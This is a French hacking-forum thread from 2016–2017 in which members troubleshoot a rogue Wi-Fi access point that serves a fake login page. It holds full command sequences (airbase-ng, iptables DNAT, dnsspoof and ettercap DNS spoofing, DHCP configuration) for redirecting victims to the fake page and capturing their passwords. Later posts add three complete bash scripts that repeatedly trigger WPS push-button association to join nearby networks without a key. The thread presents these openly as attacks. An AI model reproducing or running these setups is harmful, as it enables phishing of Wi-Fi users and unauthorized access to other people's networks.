Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-08-2016 13:24:23

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Rogue ap fakepage

Bonjours à tous.

Je viens vers vous car je touche au but et j'ai besoin d'un petit coup de pouce.
Je réussi à mettre en place un serveur transparent avec accès internet sur mon ordinateur cible.
Merci à Antares et oyabi au passage.
Malheureusement je n'arrive pas à charger ma fakepage lors de n'importe quelle recherche.
Le pc cible me retourne pas d’accès internet. Par contre si je tape l'ip de at0 sur mon pc cible 192.168.2.1 j'ai ma page de teste Apache2 qui ce charge.

Les commandes utilisées sont les suivantes :

ifconfig wlan2 down
iwconfig wlan2 mode monitor
ifconfig wlan2 up

airbase-ng -c 3 -e teste -v wlan2

ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0

udhcpd /tmp/udhcpd.conf

service apache2 start
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
dnsspoof -i at0 -f /root/dns.txt

Mon UDHCPD.conf :

max_leases 10
start 192.168.2.10
end 192.168.2.20
interface at0
domain local
option dns 8.8.8.8
option subnet 255.255.255.0
option router 192.168.2.1
lease 7200
lease_file /tmp/udhcpd.leases

Mon dns.txt :

192.168.2.1 *.*

Je pense que le probléme doit venir d'une de ces deux lignes la :

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1

qui ne semble pas être bonne par rapport à mon fichier DHCPD.conf
et je pense peut être avec mon options domaine-name-server

option dns 8.8.8.8

Une idée ??
Merci

edit : J'ai essayer de changer mon option DNS dans mon fichier udhcpd.conf est de le remplacer par mon adresse routeur 192.168.2.1 ça ne change rien.
ma page ce charge toujours en tapant 1.168.2.1 et 8.8.8.8 et ça je ne comprend pas trop pourquoi !!

Dernière modification par Sinaï00 (04-09-2016 10:47:04)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-09-2016 23:03:53

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Rogue ap fakepage

Les outils utilisé : kali linux 2016, udhcpd, airbase-ng, apache2, dnsspoof.

Bon j'ai finalement réussi à :

-Créer un réseau avec accès à internet.
-paramétrer tant bien que mal mon serveur udhcp et donner une adresse ip à ma cible.
-faire fonctionner presque correctement apache2
-faire un dnsspoof presque efficace

Mon soucis c'est que quand la cible ce connecte à ma rogue elle n'est pas toujours rediriger vers ma page de test apache2 contenu dans le dossier var/www/
Au moins elle est un peu rediriger, c'est toujours mieux qu'il y a une semaine.

J'ai essayer de mettre la régle iptable suivant qui pourtant devrait rediriger l'ensemble du trafic vers ma page de teste mais rien n'y fait. J'ai toujours besoin d'un dnsspoofing pour rediriger l'ensemble du traffic.

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1

J'ai régler le probléme de l'erreur 404 grâce à un fichier .htacces présent dans mon dossier var/www

Mon fichier dns.txt contient les éléments suivant :

192.168.2.1 A *.fr
192.168.2.1 A *.com
192.168.2.1 A *.net
192.168.2.1 A *.org
www.* A 192.168.2.1
http//.* A 192.168.2.1
https//.* A 192.168.2.1

Malheureusement pour l'ensemble des fichiers en https cela ne marche pas...
mes question sont les suivantes :
Comment faire pour forcer l'ensemble du trafic à ce rediriger vers ma fakepage ??
Pourquoi avec ma réglé iptable cela ne fonctionne pas simplement ^^ ??
C'est forcément possible car avec les réseaux ouvert du style free wifi on à une page de connexion qui reste la même peu importe l'url taper donc la pas de problème de DNS  ??

Rappelle des commandes utilisé :

touch /tmp/udhcpd.leases

airbase-ng  -e "teste" -c 1 wlan1

ifconfig at0 192.168.2.1 netmask 255.255.255.0

route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1

echo 1 > /proc/sys/net/ipv4/ip_forward
	
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1

udhcpd /tmp/udhcpd.conf

service apache2 start

dnsspoof -i at0 -f /root/dns.txt

Voilà c'est un question plutôt spécifique, j’espère que quelqu’un passant par la pourras m'aider à trouver un semblant de réponse.

Mon objectif étant après ça de développer un petit tool en python pour automatiser l'ensemble du processus.
Je sais que ça à déjà était fait mais j'ai envie de le faire moi même, ça me permet de me faire la main.

Hors Ligne

#3 09-09-2016 22:30:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue ap fakepage

Salut SinaÏ00,

Si j'ai bien compris, ta redirection fonctionne correctement pour les pages en HTTP, mais bloque pour les HTTPS ? Dans ce cas, tu devrais ajouter une règle de redirection sur le port 443, identique à celle pour le port 80 :

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1

Le problème, c'est que si tu n'as pas un certificat proprement signé, ça va faire gueuler n'importe quel navigateur un peu récent (et sérieux).

Une meilleure piste (si tu veux imiter les portails genre FreeWiFi, c'est de déployer un "portail captif" (captive portal en anglais), qui sert précisément à ça. À l'époque, j'avais un peu travaillé avec WiFiDog (en mode ultra-simpliste), mais je ne me rappelle pas assez des détails pour te donner une base de tutoriel.
C'est également possible de créer un portail captif en utilisant Apache (mais j'ai jamais vraiment accroché avec Apache, trop lourd et overkill pour mon usage en général). Tu peux également trouver des tutos sur le net, surtout en anglais. Ça doit être possible avec Nginx également, voir même avec Django si tu touches un peu python.

Le challenge à partir de là, c'est de sortir du portail captif, genre rediriger la victime vers son site web souhaité une fois qu'elle a entré son mot de passe. Mais je ne sais pas si ça fait partie de tes objectifs, ou si tu veux juste "isoler" la victime en question sur une fakepage statique.

Bonne chance ! smile

Hors Ligne

#4 12-09-2016 21:13:48

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Rogue ap fakepage

yes merci beaucoup de ta réponse. Je vais me pencher la dessus. Il semblerai qu'il sois possible de monter un portail captif uniquement avec iptables et apache2 mais je n'arrive pas encore à gérer iptables correctement pour en arriver la.
Puis c'est vrai que Apache il y'a  beaucoup de paramètre à prendre en compte...
Je connaissais pas le terme de portail captif, bien que tu en ais parlé sur ton blog j'ai réussi à pas le voir !
J'ai fais quelques recherches et c'est vrai qu'avec ce terme de vocabulaire ça ouvre beaucoup mon chant de recherche smile

Pour l'instant j'ai trouvé un solution plutôt convenable, c'est de travailler avec ettercap. L'avantage c'est qu'un fois le pc cible connecté sur le réseaux une page web s'ouvre automatiquement avec la fakepage.
Et ça c'est plaisant ^^

Si ça intéresse quelqu’un qui passe par la, voici la démarche à suivre :

airbase-ng -e teste -c 3 wlan1

service apache2 start
ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
udhcpd /tmp/udhcpd.conf

ettercap -Tqi at0 -P dns_spoof

Si peu de ligne de code pour autant de temps de recherche ça me fatigue!! roll
La page s'ouvre automatiquement et fonctionne pour l'ensemble des requête en HTTP.
Pour le HTTPS il n'y à pas de connections

Voilà après suffit normalement de récupérer les donnés avec mysql ou wireshark sur at0. pas essayé encore.

Il y'a encore des modifications à faire, mais c'est déjà un peu fonctionnel.

En tout cas merci des conseils antares, je vais faire des recherches sur ce nouveau terme pour arriver à quelque chose de concluant.
Saloute wink

Hors Ligne

#5 03-06-2017 15:53:26

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

supprimer

Dernière modification par [email protected] (17-07-2017 12:17:49)

Hors Ligne

#6 03-06-2017 21:29:32

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 540

Re : Rogue ap fakepage

Windows cherche automatiquement un service pour auquel se connecter par conséquent avec un petit serveur radius hébergeant la fake page ça marche très bien smile

Hors Ligne

#7 04-06-2017 09:11:01

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

fin

Dernière modification par [email protected] (17-07-2017 12:18:46)

Hors Ligne

#8 04-06-2017 09:52:27

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Rogue ap fakepage

j'ai trouvé cette lecture qui est intéressante., pour l'ouverture de la fakepage. Là en l’occurrence c'est un serveur proxy (squid)
J'ai pas eu le temps de tester mais c’est intéressant.

https://www.lambot.info/un-hotspot-wifi/

Mais c'est chouette de poser la question comme ça, tout simplement  !
Je vais peut-être finir par réussir à l'avoir ma page pop-up  ;-)

Koala tu utilise toujours apache2 avec ton serveur raduis ou tu peu t'en passer ?

bonne journée

Dernière modification par Sinaï00 (04-06-2017 10:33:46)

Hors Ligne

#9 04-06-2017 11:18:16

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Rogue ap fakepage

tien [email protected] j'ai du nouveau ce matin. En faisant quelque teste j'arrive à un résultat plus que correcte

Le résultat une fois la connexion effectué sur le réseau est le suivant :
- redirection http vers page de connexion.
- Dans le cas d'une requête https, ouverture d'un page  sous chrome à la place de la page demandé. Cette page demande l'autorisation de rediriger l'utilisateur vers une page de connexion afin de s’identifier au réseau wifi. puis ouverture de la fakepage.

Je fais quelques teste pour voir comment ça fonctionne (w10 firefox opera ....) puis je partagerai mon script dans un post dédié.

En tout cas pour l'instant pas besoin de serveur proxy.  cool

Hors Ligne

#10 04-06-2017 11:33:37

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

fin

Dernière modification par [email protected] (17-07-2017 12:19:24)

Hors Ligne

#11 04-06-2017 12:03:32

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Rogue ap fakepage

Yep ça marche avec firefox.
Par rapport au lien que je t'ai envoyé. il y'a ce petit passage qui pourrait être intéressant dans la partie squidguard :


Créez le fichier whitelist ( /var/lib/squidguard/db/whitelist ) contenant les domaines autorisées:

ons'enfou.com
blaba.de

"Ainsi que le fichier whiteurl ( /var/lib/squidguard/db/whiteurl ) contenant les urls autorisées. Ces urls DOIVENT être accessibles par vos clients, sinon une page de login s’ouvrira car le système client aura détecté que vous êtes derrière un captive portal grâce au protocole WISPr. Le protocole WISPr, intégré à la plupart des appareils teste de manière invisible l’accès à une page pour détecter la présence de captive portal. Dans le cas où un captive portal est détecté, une page web s’ouvre en popup et pointe vers la page de connexion du captive portal. (références: Erratasec, cadinc, wikipedia)"

bref ça peut être une solution viable.
Configurer squid et semble un peu compliqué.
Je m'y attarderai plus tard...

Dernière modification par Sinaï00 (04-06-2017 12:43:27)

Hors Ligne

#12 04-06-2017 20:57:00

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 540

Re : Rogue ap fakepage

@ [email protected]

La méthode du wps_pbc qui s'enclenche tout les 120 secondes il suffit de la mettretraite dans une boucle  ( while do en bash) ce bout de code se trouve dans hostbase, ouvre le script et cherche 120 en mot clé tu devrai trouver ce qui t'intéresse smile

@ Sinai00

Oui j'utilise toujours mon petit apache couple à freeradius.Et non je vais avoir du mal à m'en passer vue que sous win10 longlet de la page s'ouvre tout seul dans le navigateur, pas besoin de s'occuper du https dans ces cas là vue que c'est un nouvel onglet qui s'ouvre wink

Sous Windows 7 le message "des informations supplémentaires peuvent être recu" s'affiche dans la barre des tâches quand à Android le Wi-Fi avec un point d'interrogation apparaît avec le message suivant " Non connecté, cliquez ici pour vous connecter "

Pourquoi faire un truc qu'il faut adapté à tout les navigateurs quand on a tout les tools qui faut a disposition cool

Hors Ligne

#13 05-06-2017 11:24:22

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

fin

Dernière modification par [email protected] (17-07-2017 12:19:56)

Hors Ligne

#14 05-06-2017 20:26:26

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Rogue ap fakepage

@koala

Je suis bien d'accord avec toi. Je vais essayer de configurer ça.


La solution que j'ai trouvé fonctionne bien sous w7 w8 sur chrome et firefox ainsi qu'android mais sur w10 j'ai un problème de certificat sur chrome et ça marche nickel sur firefox.
Sur un pc j'ai même la page qui s'ouvre en pop up... je me demande pourquoi elle ne s'ouvre pas sur tout les pc w10 testé .... mystère !

Je partagerai le script quand je l'aurai simplifié et tester, ça peut toujours servir.

Bon je vais bosser sur freeradusu ça à l'aire bien quand même smile

saloute !

Hors Ligne

#15 10-06-2017 17:39:58

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

fin

Dernière modification par [email protected] (17-07-2017 12:20:23)

Hors Ligne

#16 12-06-2017 21:57:48

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : Rogue ap fakepage

j'en ai aucune idée personnellement j'ai pas eu trop le temps de me pencher dessus. Mais si tu trouves prévient moi steplait ;-)

Hors Ligne

#17 14-06-2017 12:38:27

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

fin

Dernière modification par [email protected] (17-07-2017 12:21:01)

Hors Ligne

#18 15-06-2017 10:00:06

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 540

Re : Rogue ap fakepage

Salut,

Freeradius n'a rien de bien compliquer, je conseil de se pencher sur chilispot qui lutise c'est un bon exemple.Pour le reste je ne connais pas ce steve mais le premier tuto de l'attaque date de 2014 et a ete poster sur ce forum même donc apres cest tout a fait possible que dautre ce sont attribué la chose.En plus il s'agit pas vraiment d'une attaque mais plus de social engineering.Pour le reste mdk3 je n'en suis pas le créateur c'est un bon vieux machin qui marche encore super, il suffit de tester différentes commandes et de voir les options.Sinon c'est un forum de libre échange donc tu peux publié ce que tu veux cool

Hors Ligne

#19 15-06-2017 10:15:42

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

Bonjour Mr Koala,
je sais bien que vous n etes pas l'inventeur de mdk3 mais plutot de cette methode:
======= Utilitaire d'automatisation de l'attaque Koala =======
------------------------Par Steeve ASENSI---------------------

Permet d'exploiter la vulnérabilité lié au bouton Push d'association WPS présent sur de nombreuses box.
Le tool va s'associer sur n'importe quelle point d'accés environnant dont le bouton d'association aurait été enclencher.
Ainsi, plus besoin de connaitre la clé WPA ou le code PIN, il n'y a plus d'authentification necessaire !
L'efficacité du tool réside dans la rapidité qu'il aura pour s'associer au point d'accès avant quelqu'un, la machine sera toujours plus rapide en execution, rendant la technique redoutable ...

Utilisation :
-------------

copiez ce script et nommez le powner_laucher

#!/bin/bash

echo "Selectionnez votre interface réseau :"
sleep 1
iwconfig
echo "Quelle interface ?"
read interface
echo $interface > interface.txt
wpa_cli interface_list > current_interface.txt
current_interface=$(cat current_interface.txt)
if [ ! $currrent_interface = "Selected interface '$interface'" ]; then
    echo ""
    echo "Quel soit être le délai de ré-assossiation (en secondes) ?"
    read delai
    echo $delai > delai.txt
    gnome-terminal -e "./pbc_wps_powner"
    gnome-terminal -e "./config_network"
    wpa_cli interface $interface
else
    echo "identique" > resultat.txt
    echo ""
    echo "Quel soit être le délai de ré-assossiation (en secondes) ?"
    read delai
    echo $delai > delai.txt
    gnome-terminal -e "./pbc_wps_powner"
    gnome-terminal -e "./config_network"
    wpa_cli
fi   


ensuite copiez ce script et nommez le pbc_wps_powner

#!/bin/bash

delai=$(cat delai.txt)
identique=$(cat resultat.txt)
interface=$(cat interface.txt)
if [ $identique = "identique" ]; then
    echo "CTRL + C pour quitter !"
    sleep 2
    while true; do
    wpa_cli wps_pbc any
    sleep $delai
    done
else
    echo "CTRL + C pour quitter !"
    sleep 2
    while true; do
    wpa_cli wps_pbc any interface $interface
    sleep $delai
    done   
fi


et enfin copiez ce script et nommez le config_network

#!/bin/bash

interface=$(cat interface.txt)
echo "Une fois l'association effectuer appuyer sur entrer pour configurer le réseau ..."
read user
echo "Configuration du réseau ..."
sleep 2
dhclient $interface
clear
echo "Configuration terminé !"
sleep 1
echo ""
ifconfig $interface
echo ""
echo "Vous êtes désormais connécté au réseau !"
sleep 1
echo "Bye !"
sleep 5

rendez ces scripts executable:"clic droit avec la souris",propriétés,permissions et cocher la case "autoriser l éxécution du fichier comme un programme
Lancer dans un terminal "powner_laucher" & laissez vous guider wink
Merci du conseil, je vais voir avec chillispot car j avance (trop)lentement,mais j avance...
Portez vous bien...Amitiés. Papy

Hors Ligne

#20 15-06-2017 11:53:08

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 540

Re : Rogue ap fakepage

Powner_launcher lol

Hors Ligne

#21 15-06-2017 11:56:07

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

Cest pas bien comme truc?

Hors Ligne

#22 15-06-2017 20:55:50

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 540

Re : Rogue ap fakepage

Le nom me fait rire cool je dis pas c'est pas bien mais faire 3 script pour 1 chose c'est pas le mieux.J'ai un vieux script sous la main qui fait ça je le posterai de retour chez moi (pas avant le moi prochain ).

Hors Ligne

#23 17-07-2017 12:35:24

[email protected]
Banni(e)
Lieu : Avignon
Inscription : 03-06-2017
Messages : 21

Re : Rogue ap fakepage

Bonjour Monsieur,
Je m'excuse de revenir vers vous mais,je voudrai savoir si,à la lecture du script Powner_launcher ci-dessus,vous pourriez me dire ce qui ne vas pas,car le script à l'air de fonctionné,mais quand le programme me répond  "Vous êtes désormais connécté au réseau !",en fait il ne me connecte a rien.Voilà; merci monsieur.
Papy.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]